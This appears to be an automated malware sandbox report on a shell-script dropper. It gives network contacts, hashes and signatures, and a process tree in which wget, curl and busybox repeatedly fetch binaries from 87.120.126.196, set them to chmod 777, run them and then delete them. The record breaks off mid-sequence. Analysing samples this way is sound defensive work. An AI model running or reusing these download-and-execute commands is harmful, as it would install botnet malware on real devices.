BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/749-1-0xb6777000-0xb6788044-memory.dmp

memory/839-2-0xb672b000-0xb673c044-memory.dmp

memory/857-3-0xb6705000-0xb6716044-memory.dmp

memory/869-4-0xb6710000-0xb6721044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-25 01:27

Reported

2024-10-25 01:30

Platform

debian9-mipsbe-20240729-en

Max time kernel

62s

Max time network

63s

Command Line

[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO N/A
N/A /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy N/A
N/A /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt N/A
N/A /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM N/A
N/A /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 N/A
N/A /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn N/A
N/A /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK N/A
N/A /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq N/A
N/A /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 N/A
N/A /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI N/A
N/A /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw N/A
N/A /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 N/A
N/A /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj N/A
N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj N/A
N/A /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM N/A
N/A /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 N/A
N/A /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn N/A
N/A /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO N/A
N/A /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy N/A
N/A /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt N/A
N/A /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq N/A
N/A /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK N/A
N/A /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 N/A
N/A /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 N/A
N/A /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI N/A
N/A /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /usr/bin/curl N/A
File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /usr/bin/curl N/A
File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /usr/bin/curl N/A
File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /usr/bin/curl N/A
File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /usr/bin/curl N/A
File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /usr/bin/curl N/A
File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /usr/bin/curl N/A
File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /usr/bin/curl N/A
File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /usr/bin/curl N/A
File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /usr/bin/curl N/A
File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /usr/bin/curl N/A
File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /usr/bin/curl N/A
File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /usr/bin/curl N/A
File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /usr/bin/curl N/A
File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /usr/bin/curl N/A
File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /usr/bin/curl N/A
File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /usr/bin/curl N/A
File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /usr/bin/curl N/A
File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /usr/bin/curl N/A
File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /usr/bin/curl N/A
File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /usr/bin/curl N/A
File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /usr/bin/curl N/A
File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /usr/bin/curl N/A
File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /usr/bin/curl N/A
File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /usr/bin/curl N/A
File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /usr/bin/curl N/A
File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /usr/bin/curl N/A
File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /usr/bin/curl N/A

Processes

/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh

[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/chmod

[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO

[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/rm

[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/wget

[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/chmod

[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy

[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/rm

[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/chmod

[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt

[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/rm

[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/wget

[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/chmod

[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM

[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/rm

[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/wget

[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/chmod

[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2

[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/rm

[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/wget

[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/chmod

[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn

[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/rm

[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/wget

[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/chmod

[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK

[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/rm

[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/wget

[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/chmod

[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq

[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/rm

[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/wget

[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/chmod

[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2

[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/rm

[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/wget

[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/chmod

[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI

[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/rm

[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/wget

[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/chmod

[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw

[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/rm

[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/usr/bin/wget

[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/chmod

[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4

[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/rm

[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/wget

[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/chmod

[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj

[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/rm

[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/wget

[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/chmod

[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz

[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/rm

[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/wget

[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/chmod

[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz

[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/rm

[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/wget

[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/chmod

[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj

[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/rm

[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/wget

[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/chmod

[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM

[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/rm

[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/wget

[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/chmod

[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2

[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/rm

[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/wget

[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/chmod

[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn

[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/rm

[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/wget

[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/chmod

[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO

[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/rm

[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/wget

[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/chmod

[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy

[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/rm

[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/wget

